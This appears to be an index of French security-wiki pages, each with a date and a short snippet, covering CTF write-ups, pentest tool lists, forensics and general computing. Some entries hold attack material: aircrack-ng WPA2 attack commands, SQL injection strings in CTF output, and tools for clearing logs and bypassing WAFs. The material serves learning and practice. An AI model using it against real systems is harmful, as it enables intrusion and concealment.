Zenk - Security

29c3

2012-12-30T13:08:58+02:00

Web regexdb 100 pts Exploitation minesweeper 100 pts Misc JSUX 100 pts

aaron_swartz

2018-01-21T23:31:39+02:00

Aaron Swartz a co-créé Creative Commons à l'âge de 12 ans, RSS à l'âge de 13 ans, Reddit à l'âge de 15 ans, et l'une des principales raisons pour lesquelles SOPA n'a pas réussi. Il s'est suicidé en 2013 en raison de la surveillance illégale du gouvernement sur lui-même, ainsi que d'un certain nombre d'accusations inventées.

active_directory

2022-11-23T13:41:51+02:00

FIXME Le PAD pour proposer une amélioration à cette page : intro Le problème est que la plus part des Active Directory ont été mis en place vers 2005 et ils n'ont pas été conçu pour les menaces d'aujourd'hui.

ada_lovelace

2018-01-27T18:15:07+02:00

[Ada Lovelace (1840).] Ada Lovelace, de son nom complet Augusta Ada King, comtesse de Lovelace, née Ada Byron le 10 décembre 1815 à Londres et morte le 27 novembre 1852 à Marylebone dans la même ville, est une pionnière de la science informatique. Elle est principalement connue pour avoir réalisé le premier programme informatique, lors de son travail sur un ancêtre de l'ordinateur : la machine analytique de Charles Babbage.

alsa

2017-11-04T21:59:25+02:00

Advanced Linux Sound Architecture, (abr. ALSA), est le système audio par défaut pour la plupart, sinon toutes les distributions GNU/LINUX. ALSA a remplacé Open Sound System (OSS) après la publication d'une nouvelle version d'OSS sous une licence non libre.

analyse_basique_des_malwares

2013-06-14T12:06:21+02:00

Ce qui suit est une traduction des cours se trouvant ici : qui ont été rédigé par !Hacker Rafah! et αzσσz єЈяαм . * Téléchargement et installation d'un logiciel de virtualisation : VirtualBox * Installation de Windows Xp et des additions invités sous VirtualBox * Installation Shadow Defender * Installation d'un chiffreur de clavier KeyScrambler * Outils nécessaires à l'analyse des Malwares

analyse_copie

2014-04-14T22:37:46+02:00

manuelle Précédemment, nous avons obtenu une image du support fourni grâce aux différentes méthodes de copie. De plus, nous nous sommes assurés (autant que l'on puisse le faire) de l'intégrité du process de copie. Il reste maintenant à analyser l'image.

analyse_d_un_disque_dur_de_donnees

2022-04-06T23:29:24+02:00

Cette page naît après l'analyse d'un disque dur de 500go comportant des secteurs défectueux. Il est formaté en NTFS et contient juste une partition de données qu'il fallait récupérer bien sûr. Ce disque n'est plus reconnu par windows7. Il propose de le formater pour pouvoir l'utiliser.

android

2020-05-22T19:05:05+02:00

FIXME Le PAD pour proposer une amélioration à cette page : Documentation 🛠 awesome-mobile-security awesome 🛠 Mobile Application Penetration Testing Cheat Sheet

anonymisation

2018-05-12T10:12:29+02:00

L'internet est un endroit cruel et horrible. Vous voudrez peut-être vous laisser tomber hors de la matrice pour rejoindre un réseau anonyme. Alternativement, vous pouvez prendre les mesures décrites sur cette page pour réduire au minimum la fouille de données en réduisant votre empreinte en ligne.

antitrust

2017-11-05T11:40:04+02:00

Un procès anti-trust est un procès fédéral aux États-Unis qui fait valoir la tentative d'une entreprise créant un monopole illégal sur leur principal domaine d'activité entravant la libre concurrence. En France En France, il n'existe pas de loi antitrust en tant que telle, mais seulement pour les entreprises l'obligation de soumettre un projet de fusion ou de prise de contrôle à autorisation administrative préalable dès lors que cette fusion est susceptible de conduire à une position dominante…

app_forensic

2012-06-26T14:58:11+02:00

Le Forensic (sous entendu Computer Forensic), en français appelé analyse forensique ou plus souvent investigation numérique, est l'art et la technique d'analyser un système mort (ordinateur, téléphone portable ...) dans le but d'en sortir les éléments de preuves.

app_stegano

2017-04-09T15:33:57+02:00

* Comprendre le format BMP Lien - Lien * Maîtriser les différents principes de stéganographie sur le BMP Lien - Lien - Lien * Voir quels formats de fichier sont les plus exploiter et par quels techniques Lien * Outils : Exiv2

app_web

2012-06-28T22:01:58+02:00

* Apprendre l'HTML et le CSS -> Lien * Apprendre le Javascript -> Lien * Apprendre le PHP -> Lien - Lien - Lien * Savoir à quoi sert le fichier robots.txt et en quoi celui-ci peut être utile dans la collecte d'information -> Lien - Lien * Comprendre comment fonctionne le vol de sessions -> Lien * Liste numérotéeApprendre à éxploiter les XSS, persistantes et et non persistantes -> Lien - Lien - Lien - Lien - Lien * Apprendre à exploiter les CSRF -> Lien - Lien * Apprendre à é…

apprentissage

2012-06-28T22:25:51+02:00

FIXME Si vous commencez une page, pensez à ajouter le lien vers celle-ci dans la catégorie appropriée sur le sommaire ! Merci ! Si vous voulez proposer des liens : * Rétro-Ingénierie * Sécurité Applicative * Sécurité Réseau * Pentest * Cryptologie * Repository & Groupes d'articles * Les choses utiles, voir indispensable à maîtriser

batteries_externes

2025-01-01T11:52:27+02:00

Comparatif des protocoles supporté par nos batteries externes. Hama Supreme 5HD Powerbank 5000 mAh: * DCP SAM 2A Vinsic 20 000mAh VSPB206: * DCP SAM 2A Global Charger Mega Mana 20 000mAh: * QC3.0 5V, 9V, 12V, 3.6-12V (Quick Charge) * FCP 5V, 9V, 12V (Huawei Fast charge) * SCP 3.40-12.00V, 25W (Huawei Super charge) * AFC 5V, 9V, 12V (Samsung Fast charge) * SFCP (Spreadtrum Fast charge) * DCP SAM 2A (Dedicated Charging Port) * Apple 2.4A

burpsuite

2020-06-20T21:22:48+02:00

Configurer Burpsuite sur Genymotion(emulateur android)

c_c

2019-10-25T12:55:49+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 [Astrée]() :copyright: - Sound static analyzer based on abstract interpretation for C/C++, detecting memory, type and concurrency defects, and MISRA violations.

c_sharp

2019-10-25T12:56:14+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 [.NET Analyzers]() - An organization for the development of analyzers (diagnostics and code fixes) using the .NET Compiler Platform.

carte_-_cheat_sheet_-_des_outils_pour_pentest_active_directory

2022-11-21T13:56:32+02:00

mindmap AD :

carte_-_des_outils_d_investigation_numerique

2022-09-13T11:24:27+02:00

source :

carte_-_des_outils_en_cryptographie

2022-09-13T11:22:57+02:00

source :

carte_-_des_outils_l_audit_de_code

2019-10-09T13:06:31+02:00

source :

carte_-_des_outils_pour_browser

2019-10-23T14:01:40+02:00

source :

carte_-_des_outils_pour_pentest_active_directory

2022-09-07T22:55:42+02:00

mindmap AD : mindmap DACL :

carte_-_des_outils_pour_webapp

2019-10-23T14:02:23+02:00

source :

carte_-_des_outils_pour_wifi

2019-10-09T13:10:45+02:00

source :

cheatsheet_wifi

2021-12-09T13:59:42+02:00

Cette page est un fork de WPA2 PSK attack with aircrack-ng suite. ---------- ifconfig wlan1 # check wireless IFace sudo airmon-ng check kill # kill issue causing processes sudo airmon-ng start wlan1 # start monitor mode

chiffreur_de_clavier_keyscrambler

2013-06-14T11:14:39+02:00

KeyScrambler permet de chiffrer tout les données saisies au clavier est ceci dans le but de fournir une protection contre les Keyloggers Il est disponible en plusieurs version, la version gratuite semble être tout à fait correcte . Vous pouvez le télécharger depuis le site officiel :

code_scanners

2023-11-10T10:50:44+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 Semgrep - Semgrep accelerates your security journey by swiftly scanning code and package dependencies for known issues, software vulnerabilities, and detected secrets with unparalleled efficiency.

compilation_de_payloads

2020-07-26T21:40:41+02:00

FIXME Le PAD pour proposer une amélioration à cette page : powershell 🛠 Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security

compilation_de_rapports_de_bug_bounty

2020-11-08T20:23:25+02:00

* XSS_reports - Compilation de rapport XSS sur hackerone *

compilation_de_ressource

2020-01-21T22:21:22+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 ☆☆☆ Scanners Box also known as scanbox, is a powerful hacker toolkit, which has collected more than 10 categories of open source scanners from Github, including subdomain, database, middleware and other modular design scanner etc.

compilation_de_ressources_outils_reseau

2020-04-24T19:07:47+02:00

🛠 PuTTY - is an SSH and telnet client, developed originally by Simon Tatham. 🛠 nmap - is a free and open source (license) utility for network discovery and security auditing. 🛠 The main goal for this script is to automate all of the process of recon/enumeration that is run every time, and instead focus our attention on real pen testing.

compilation_de_ressources_outils_web

2020-07-23T07:31:07+02:00

FIXME Le PAD pour proposer une amélioration à cette page : Phase de reconnaissance, cartographie et d’énumération: * Des outils pour automatiser Google Hacking Database * [3] Des outils pour scanner des fichiers et dossiers intéressant * Des outils pour faire une cartographie d'un site

compilation_de_vm_web_vulnerables

2020-02-26T23:11:01+02:00

Applications, serveurs et sites Web vulnérables Ce qui suit est une collection de serveurs vulnérables (VM) ou de sites Web que vous pouvez utiliser pour pratiquer vos compétences (classés par ordre alphabétique). * bWAPP : * Damn Vulnerable ARM Router (DVAR): * Damn Vulnerable iOS Application (DVIA): * Damn Vulnerable Web App…

config_files

2019-10-25T12:59:58+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 [dotenv-linter]() - Linting dotenv files like a charm. 🛠 [gixy]() - a tool to analyze Nginx configuration. The main goal is to prevent misconfiguration and automate flaw detection.

configurer_burpsuite_sur_genymotion_emulateur_android

2020-06-21T09:56:10+02:00

Mettre burpsuite comme proxy mettre le proxy 10.0.3.2 (ip par défaut du host pour genymotion) port 8080 Installer le certificat de burpsuite prérequis : votre téléphone doit avoir un code pin et doit avoir un une application pour renomer un fichier (file manager) et firefox

copie_support

2017-04-09T15:33:57+02:00

commande dd dd if=/dev/sdx of=image.dd bs=512 conv=noerrors,sync Cette commande va copier l'intégralité du disque sdx dans le fichier image.dd. * bs=512, taille des blocks du disque, si non mentionnée, dd prend la valeur de la taille des blocks par défaut. * conv=noerrors,sync dd ne s'arrêtera pas en cas d'erreur de lecture sur un block. Après plusieurs essais, il s'avère que dd s'interrompt en cas de block défectueux sur un disque en panne... Doit-on différencier un block défectueux d'u…

crypto-monnaie

2021-01-09T12:19:34+02:00

[Forage de l'ethereum avec 5 GPU] Les crypto-monnais se réfèrent à un certain nombre de protocoles qui peuvent être utilisés pour stocker des informations financières sur Internet sans avoir besoin d'un arbitrage central ou un service de réglementation, comme une banque ou un gouvernement. Cela est possible en utilisant la cryptographie à clé publique/privée, basé sur une communication P2P, et un registre public distribué appelé blockchain. Les principales crypto-monnaies actuelles (Novembre 2…

csaw2012_quals

2017-04-09T15:33:57+02:00

Trivia Trivia1 100 pts Trivia2 100 pts Trivia3 100 pts Trivia4 100 pts Trivia5 100 pts Recon Jordan Wiens 100 pts Jeff Jarmoc 100 pts Julian Cohen 100 pts Dan Guido 400 pts Yoda 400 pts Web c4ca4238a0b923820dcc509a6f75849b 100 pts c81e728d9d4c2f636f067f89cc14862c 200 pts

csaw_ctf_2013_quals

2013-09-24T00:07:42+02:00

Trivia Trivia1 50 pts Trivia2 50 pts Trivia3 50 pts Trivia4 50 pts Trivia5 50 pts Recon hystorypeats 100 pts Web Reversing DotNet 100 pts keygenme 400 pts Exploitation Misc Crypto

ctf_mssis_ctf

2018-05-14T10:44:14+02:00

root@kali:~/Downloads# python client.py [+] Test level1 ... Welcome on level 1 ! Welcome b'admin” OR “1”=“1', the flag is 'ESE{n0T_S0_H4rd_R1gHt_!?}' [+] Test level2 ... Welcome on level 2 ! Citation #123 union SELECT * fROM flag: ESE{7d2f9e9beab248febaf5bddffc3a39a4}

ctf_thc_toulouse_hacking_convention

2018-04-10T00:03:04+02:00

* web 1 (202pts) : le writeup de BFF ici : On a utilisé la même méthode en reversant le custom sha1 du script. * réseau 1 : (50pts) : * forensic 1 (400pts): ci-dessous. * reverse 1 (100pts) : c'est mon collègue, patrice qui l'a fait, j'ai pas d'info dessus pour l'instant. * misc (100pts) : un chall ou il fallait remettre en ordre un papie…

dctf_qual_2014

2017-04-09T15:33:57+02:00

Quest * QUEST 100 * QUEST 200 * QUEST 300 * QUEST 400 Web * WEB 100 * WEB 200 * WEB 300 * WEB 400 Network * NETWORK 100 * NETWORK 200 * NETWORK 300 * NETWORK 400 Exploit * EXPLOIT 100 * EXPLOIT 200 * EXPLOIT 300 * EXPLOIT 400

dell_personnage_public

2018-01-22T00:05:18+02:00

Michael Dell est le fondateur et le président de Dell Computers, une société spécialisée dans les clones IBM. Lien externe Histoire de Dell

dennis_ritchie

2019-05-12T20:36:20+02:00

Dennis MacAlistair Ritchie, né le 9 septembre 1941 à Bronxville dans l'État de New York et mort le 12 octobre 20111 à Berkeley Heights dans le New Jersey, est un des pionniers de l'informatique moderne, inventeur du langage C et codéveloppeur de Unix. Il est parfois désigné par dmr, son adresse électronique aux Laboratoires Bell.

des_outils_pour_audit_le_dns

2020-01-01T12:57:58+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 DNSSpy Monitor, validate and verify your DNS configurations 🛠 dnsdiag - is a DNS diagnostics and performance measurement tools.

des_outils_pour_automatiser_google_hacking_database

2019-10-29T14:18:49+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 Uses advanced search operators to find juicy information about target websites

des_outils_pour_du_post_exploitation

2019-10-23T13:56:12+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 post-exploitation framework

des_outils_pour_effacer_ses_traces_sur_un_serveur

2019-10-23T14:04:34+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 Clear all your logs in [linux/windows] servers 🛡️

des_outils_pour_exploiter_les_xxe

2020-07-23T07:33:19+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 Uility to embed XXE and XSS payloads in docx,odt,pptx,etc - any documents that is a zip archive with bunch of xml files inside

des_outils_pour_faire_des_tests_d_autorisation

2019-10-23T13:54:04+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 Automatic authorization enforcement detection extension for burp suite written in Jython developed by Barak Tawily in order to ease application security people work and allow them perform an automatic authorization tests

des_outils_pour_faire_un_audit_sur_la_cryptographie

2020-05-22T09:40:04+02:00

Heartbleed test CVE-2016-2107

des_outils_pour_faire_une_cartographie_d_un_site

2020-09-06T21:31:46+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 Unfurl - Extract and Visualize Data from URLs 🛠 bscan is a command-line utility to perform active information gathering and service enumeration.

des_outils_pour_la_deserialisation

2020-09-21T00:33:09+02:00

FIXME Le PAD pour proposer une amélioration à cette page : PHP 🛠 PHPGGC JAVA 🛠 A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization .

des_outils_pour_outre_passer_les_waf

2019-10-30T20:17:28+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 Add headers to all Burp requests to bypass some WAF products 🛠 XORpass is an encoder to bypass WAF filters using XOR operations.

des_outils_pour_race_condition

2020-06-01T14:33:13+02:00

Race the Web

des_outils_pour_scanner_des_cms

2022-12-14T09:13:56+02:00

FIXME Le PAD pour proposer une amélioration à cette page : Wordpress 🛠 online free scan 🛠 wpxf - WordPress Exploit Framework

des_outils_pour_scanner_des_fichiers_et_dossiers_interessant

2020-01-01T12:57:23+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 Interesting Files Scanner extends Burp Suite's active scanner, with scans for interesting files and directories.

des_outils_pour_scanner_des_webapp_et_des_services_web

2020-06-01T14:38:47+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 AuthMatrix is a Burp Suite extension that provides a simple way to test authorization in web applications and web services.

des_outils_pour_scanner_des_xss

2020-06-01T10:41:07+02:00

FIXME Le PAD pour proposer une amélioration à cette page : XSS online scanner 🛠 Find xss online 🛠 Find xss online

des_outils_pour_scanner_et_exploiter_des_injections_de_template

2019-10-26T19:14:14+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 Server-Side Template Injection and Code Injection Detection and Exploitation Tool 🛠 Explaining Server Side Template Injections

des_outils_pour_scanner_et_exploiter_des_lfi

2020-06-25T19:54:39+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 fimap project 🛠 LFISuite 🛠 A File Inclusion & Directory Traversal fuzzing, enumeration & exploitation tool.

des_outils_pour_scanner_les_misconfiguration

2020-06-01T14:36:58+02:00

CORStest

des_outils_pour_scanner_les_ssrf

2020-10-30T17:53:54+02:00

ssrfDetector ground-control ssrf-sheriff SSRFmap Gopherus

des_outils_pour_scanner_les_xxe

2020-07-23T07:33:52+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 oxml_xxe 🛠 XXE Injector

des_outils_pour_scanner_si_le_site_est_victime_de_malware

2019-10-23T13:54:48+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 Malwoverview.py is a first response tool to perform an initial and quick triage in a directory containing malware samples, specific malware sample, suspect URL and domains. Additionally, it allows to download and send samples to main online sandboxes.

des_outils_pour_scanner_ssl

2020-06-04T22:18:00+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 sslscan - tests SSL/TLS enabled services to discover supported cipher suites. 🛠 testssl.sh - testing TLS/SSL encryption anywhere on any port.

des_outils_pour_un_scan_complet

2021-04-17T00:09:54+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 Nuclei is a fast tool for configurable targeted vulnerability scanning based on templates offering massive extensibility and ease of use.

des_ressources_et_outils_pour_l_exploitation_des_browsers

2019-11-20T17:46:54+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 I have just presented my first ever talk, “The Art of WebKit Exploitation” at BSides Delhi 2019 — for those not at the conference, it's a talk about everything I've learnt exploiting the WebKit browser engine.

des_ressources_et_outils_pour_les_injections_sql

2020-05-29T16:45:55+02:00

FIXME Le PAD pour proposer une amélioration à cette page : SQLi scanner en ligne avec version gratuite 🛠 Les outils 🛠 An automatic SQL Injection tool which takes advantage of ~DorkNet~ Googler, Ddgr, WhatWaf and sqlmap.

destruction_de_donnees

2019-05-12T18:23:43+02:00

La destruction de données est “l'art” de diverses méthodes pour effacer en toute sécurité des fichiers sur un disque dur. Pour la destruction des données, il est préférable d’effacer l’ensemble du lecteur, car la plupart des systèmes d’exploitation divulgueront les détails de vos fichiers (par exemple, des copies temporaires de votre document, des mentions dans les listes les plus récemment utilisées, des fichiers journaux, des entrées de registre, un historique des commandes, etc...)…

disque_dur

2017-11-12T20:14:05+02:00

* MBR * Outils d'analyses

disque_dur_externe

2018-01-22T01:49:36+02:00

Guide d'achat d'un disque dur externe * Acheter un disque dur interne * Acheter un boîtier externe a 15€ Pourquoi suivre les instructions ci-dessus? Si vous voulez un disque externe pour stocker ou sauvegarder vos données, il est en fait plus sage d'acheter à la place un disque dur interne et un boîtier externe pour ce lecteur. La raison en est que la plupart des lecteurs externes sont pré-installés avec des bloatwares inutiles, tels que des logiciels de synchronisation cloud, des program…

dns

2017-11-04T21:22:31+02:00

Les Domain Name Systems convertissent les noms de domaine (par exemple. wiki.zenk-security.com) en adresses IP (par exemple. 62.210.200.62). Par défaut, vous utilisez probablement le DNS de votre FAI. Serveurs DNS alternatifs Si vous n'êtes pas satisfait des services DNS de votre FAI, tenez compte des éléments suivants:

ecran_de_veille

2018-06-07T21:22:47+02:00

Les économiseurs d'écran sont une technologie défunte qui protégeait les moniteurs CRT de «burn in» - une faille dans la conception du CRT qui «brûlerait» une image statique sur l'écran de façon permanente si elle était affichée assez longtemps (plus de 12 heures). Un moniteur affecté par la brûlure pourrait toujours être utilisé pour afficher d'autres images, mais une empreinte fantomatique de l'image brûlée resterait toujours.

edward_snowden

2018-01-21T23:57:27+02:00

Edward Joseph Snowden, né le 21 juin 1983 à Elizabeth City, Caroline du Nord, est un informaticien américain, ancien employé de la Central Intelligence Agency (CIA) et de la National Security Agency (NSA), qui a révélé les détails de plusieurs programmes de surveillance de masse américains et britanniques.

eff

2017-11-04T21:37:51+02:00

L' Electronic Frontiers Foundation est la principale organisation à but non lucratif défendant les libertés civiles dans le monde numérique. Fondé en 1990, l'EFF défend la vie privée des utilisateurs, la liberté d'expression et l'innovation par le biais de litiges d'impact, d'analyse des politiques, d'activisme populaire et de développement technologique. Ils ont été fondés après l'opération d'infiltration illégale connue sous le nom de “Opération Sundevil” qui a prouvé l'ineptie de l'applicati…

environnement_de_bureau

2020-05-23T00:48:58+02:00

[GNOME 3.10] [MATE 1.6] [Cinnamon 2.0] [Unity - Ubuntu 13.10] [Pantheon - eOS 0.2] [KDE 4.12] [XFCE 4.10] [LXDE] [LXQT] Un environnement de bureau fournit un cadre pour le développement de modules. En plus de cela, un environnement de bureau complet contient une myriade de composants qui travaillent ensemble pour fournir à l'utilisateur un environnement de travail. Parmi les plus importants, nous pouvons lister le moteur de thème et le gestionnaire de fenêtres.

erreurnc

2015-07-11T16:41:13+02:00

Solutions Newbie Contest Vous essayez d'accéder à une page proposant une solution pour une des épreuves du site Newbie Contest. Par respect pour les auteurs des épreuves et en accord avec le staff de Newbie Contest, Zenk-Security a décidé de restreindre l'accès à ces solutions aux utilisateurs enregistrés disposant d'un minimum de 20 points sur la plateforme d'épreuves de Zenk-Security.

ethernet

2019-12-22T04:56:02+02:00

Ethernet Ethernet est une norme de mise en réseau filaire comprenant des ports, des câbles et des périphériques réseau standardisés. Le protocole Ethernet a ses racines dans ALOHAnet, un des premiers réseaux pré-Internet créé par l'Université d'Hawaï. Le câble Ethernet est une interface RJ-45 qui utilise l'une des deux normes de câblage. Ce sont les normes T568.

exploit_exercises_protostar

2017-04-09T15:33:57+02:00

Protostar est une machine virtuelle proposé par Exploit-Exercises.com. C'est un entrainement de base à la corruption de mémoire sur Linux/x86. La machine virtuelle est téléchargeable au format OVA, il faut l'ouvrir avec VirtualBox, il est normalement possible de la convertir pour VMWare.

failles_app

2017-04-09T15:33:57+02:00

Cette page a pour but de lister les différentes failles applicatives que l'on peut rencontrer. * Buffer overflow Débordemements de tampon * Format String Exploitation d'une format string avec printf * Race conditions * Heap overflow Corruption du tas * Stack Canary Contournement des “stack canaries” * ASLR Bypass de l'Address space layout randomization

failles_web

2020-02-08T18:51:39+02:00

FIXME Le PAD pour proposer une amélioration à cette page : Les failles web peuvent se décomposer en deux grandes parties : les failles qui s'attaquent au client et celles qui s'attaquent au serveur. Côté client * XSS - Explications sur les XSS * CSRF - Explications sur les CSRF * SOP - Bypass de la Same Origin Policy * HTTP Response Splitting - Explications sur les HRS

films

2023-11-09T11:10:05+02:00

Cette page fournit une liste de films qui gravite autour des sphères de la technologie informatique, science-fiction, mais aussi des films cyberpunks, des documentaires, des biographies... Fiction Animation Akira [Le shot de la moto emblématique de Tetsuo]

firefox

2017-11-05T13:36:27+02:00

Firefox est un navigateur web libre et gratuit, développé et distribué par la Mozilla Foundation avec l'aide de milliers de bénévoles grâce aux méthodes de développement du logiciel libre/open source et à la liberté du code source. Branches officielles Malheureusement, la série v3.6.x de Firefox n'est plus supportée. Il ne recevra plus les mises à jour de sécurité ou de stabilité.

fonctionnement

2015-06-27T21:12:35+02:00

Principe Cet espace se propose de mettre à la disposition de tous le savoir de passionnés de sécurité informatique. En aucun cas la connaissance contenue dans ce wiki n'est exhaustive et nous vous encourageons à l'alimenter, une manière d'ajouter votre pierre à l'édifice que nous tentons d'ériger.

forbiddenbits_2013

2017-04-09T15:33:57+02:00

Forbidden Bits est un CTF de type Jeopardy par équpe. * NaziWar * x93 * x94 * Crunch

forbiddenbits_2013_crunch

2017-04-09T15:33:57+02:00

Captain Crunch (250) Help the captain to find the flag! http://forbiddenbits.net/tasks/spawn.png Overview On se retrouve avec une image PNG toute noir. Solution En regardant de plus près, il existe des pixels de (0, 0, 0) et de (1, 1, 1) (RGB). En convertissant les (0, 0, 0) en Blanc et les (1, 1, 1) en Noir, on se retrouve avec un QRCode.

forbiddenbits_2013_naziwar

2017-04-09T15:33:57+02:00

Nazi War (200) Let the nazi war begin. My fuhrer will launch it: nc 88.190.221.116 1337 Overview On se retrouve avec un service qui nous permet de nous connecter à une interface pour lire des fichiers. Pour se connecter, on nous demande d'entrer un nom d'utilisateur pour générer un mot de passe associé.

forbiddenbits_2013_x93

2017-04-09T15:33:57+02:00

x93 (350) i wanna access the restricted area 95.170.83.28:3003 Overview On se connecte à un service où il est possible de faire des échanges de monnaie (d'une monnaie à une autre). Qui dit échanges, dit taux. Passer d'une monnaie à une autre puis faire le chemin inverse revient à perdre ou à gagner de l'argent !

forbiddenbits_2013_x94

2017-04-09T15:33:57+02:00

x94 (250) i wanna access the restricted area 95.170.83.28:3002 Overview L'épreuve est EXACTEMENT la même que x93. Solution Seul le port de l'exploit de x93 change. C:\CTF\FBCTF\x94>script.py EUR => 253.85 GBP => 218.31 EUR => 335.86 GBP => 288.84 EUR => 444.37 GBP => 382.16 EUR => 587.94 GBP => 505.63 EUR => 777.89 GBP => 668.99 EUR => 1029.22 GBP => 885.13 EUR => 1361.74 GBP => 1171.1 EUR => 1801.69 GBP => 1549.45 EUR => 2383.77 GBP => 2050.04 EUR => 3153.91 GBP => 2712.36 EUR => 4172.86 …

ftp

2017-11-04T20:51:43+02:00

Le File Transfer Protocol est un protocole développé au début des années 1980 pour le transfert rapide de fichiers d'un serveur à un autre. Il est lentement en train de disparaître, mais est toujours populaire parmi certains groupes les plus intransigeants.

gadgets_hardware

2024-12-18T16:03:26+02:00

Cette page liste le matos que les membres de Zenk utilise pour faire mumuze avec le hardware, quelque soit le contexte. DSlogic U16pro Le DSlogic U16pro est un analyseur logique USB, qui a une taille portable, mais des performances puissantes (fréquence d'échantillonnage jusqu'à 1 GHz, interface USB 3.0). Avec le logiciel multiplateforme DSView, vous pouvez utiliser votre ordinateur pour sniff ce qui transit entre les composants.

gcc

2017-11-05T16:42:58+02:00

GCC signifie GNU Compiler Collection. C'est un système de compilation sous licence GPL qui fait partie de la chaîne d'outils GNU. A l'origine, il s'agissait de GNU C Compiler car il ne pouvait que compiler C, mais il a depuis pris en charge plusieurs langages.

ghidra

2019-04-02T00:45:49+02:00

Présentations et tutoriels * Cours “officiels” : * Un excellent article faisant le tour des fonctionnalités principales de Ghidra: * Un autre moins complet: * Création d'un loader wasm pour Ghidra, présente la création d'un plugin Ghidra: * Article expliquant comment pa…

gimp

2018-01-28T02:27:13+02:00

GNU Image Manipulation Tool (ou GIMP en abrégé), est un remplacement libre des solutions de retouche de logiciels propriétaires, telles qu'Adobe Photoshop ou Paint.net. Controverse SourceForge Voir SourceForge Utilisabilité GIMP a été critiqué à plusieurs reprises pour ça maniabilité d'utilisation, beaucoup prétendant que Photoshop est beaucoup plus facile à utiliser. L'une des critiques les plus courantes est le manque de couches d'ajustement.

git

2017-11-05T17:02:59+02:00

Git est un système de contrôle de version distribué. Il est conçu pour être rapide, simple et puissant. Il a été créé par Linus Torvalds, et il est utilisé pour suivre le code source du noyau Linux ainsi que son propre code source. Pour une discussion colorée et intéressante sur la création de Git par Torvalds lui-même, regardez cette vidéo.

github_leak

2020-07-24T08:50:40+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 Github Scraper For Static Code Analysis 🛠 Prevents you from committing secrets and credentials into git repositories

google_chrome

2017-11-04T12:28:23+02:00

* Envoie le nom du fichier que vous téléchargez a Google pour regarder s’il est dans une liste noire; stocke votre adresse IP associée au fichier pour quelques semaines.[1] * Chaque URLs que vous commencer à taper dans votre barre d'adresse et envoyer a Google, entièrement ou fragmenté, pour faire de l'autocomplétion.[2][3] * Il se connecte a Google toutes les 30 minutes pour télécharger une liste d'URLs malicieuses, donc le fait que vous ayez Chrome d'ouvert est transmis a Google.[1] * D…

hack.lu_2014

2017-04-09T15:33:57+02:00

Hack.lu 2014 # Title Category Author(s) Points 1 wiener Crypto javex 300 (+ 90) 2 Cryptochief Reversing chief 400 (+ 100) 3 OREO Exploiting cutz 400 (+ 100) 4 Gunslinger Joe's private Terminal Misc cutz 50 (+ 20) 5 breakout Exploiting r1cky 500 (+ 100) 6 Gunslinger Joe's Gold Stash Reversing cutz 200 (+ 90) 7 Holy Moses Exploiting r1cky 300 (+ 100) 8 Big Jim's Map Reversing r1cky 400 (+ 100) 9 ImageUpload Web SLAZ 200 (+ 70) 10 ionpuke Reversing t…

hacking_case

2014-09-01T23:27:29+02:00

1. What is the image hash? Does the acquisition and verification hash match? 2. What operating system was used on the computer? root@kali:/mnt/2to/nist# file image.dd image.dd: x86 boot sector, Microsoft Windows XP MBR, Serial 0xec5dec5d; partition 1: ID=0x7, active, starthead 1, startsector 63, 9510417 sectors, code offset 0xc0 root@kali:/mnt/2to/nist# mmls image.dd DOS Partition Table Offset Sector: 0 Units are in 512-byte sectors Slot Start End Length D…

hackingweek_2014

2014-02-26T23:20:33+02:00

Crypto * Crypto-1 * Crypto-2 * Crypto-3 * Crypto-4 * Crypto-5 Exploit * Exploit-1 * Exploit-2 * Exploit-3 * Exploit-4 * Exploit-5 Reverse * Reverse-1 * Reverse-2 * Reverse-3 * Reverse-4 * Reverse-5 Web * Web-1 * Web-2 * Web-3 * Web-4 * Web-5

htpc

2018-01-24T10:50:31+02:00

Un home theater personal computer, couramment abrégé sous le sigle HTPC, est un ordinateur personnel destiné au home cinema. Il réunit en un seul composant (l’unité centrale) la plupart, sinon tous les composants d’un ensemble home cinema traditionnel.

ian_murdock

2019-05-12T20:01:43+02:00

Ian Murdock, né le 28 avril 1973 à Constance en Allemagne de l'Ouest, et mort le 28 décembre 2015 (à 42 ans) il est le fondateur du projet Debian. Il se marie à Debra Lynn, dont la contraction du prénom avec le sien donne son nom à la distribution Debian.

ide_plugins

2019-10-25T13:00:51+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 [Attackflow Extension]() :copyright: - Attackflow plugin for Visual Studio, which enables developers to find critical security bugs at real time in the source code without any prior knowledge.

impression_3d

2020-09-03T16:42:56+02:00

[Sunhokey prusa i3 2015] Également connue sous le nom de fabrication additive, l'impression 3D est l'un des processus permettant de créer un objet en trois dimensions. Bien qu’il s’agisse d’une pratique qui n’était jusqu’à il ya une dizaine d’années rarement utiliser, de nos jours l'impression 3D se popularise énormément. Beaucoups de nouvelle entreprises ont vu le jours dans le domaine de la fabrication d’imprimantes 3D, les services d'impressions a la demande, et tout ce qui concerne l’impres…

injection_elf

2019-10-14T20:42:42+02:00

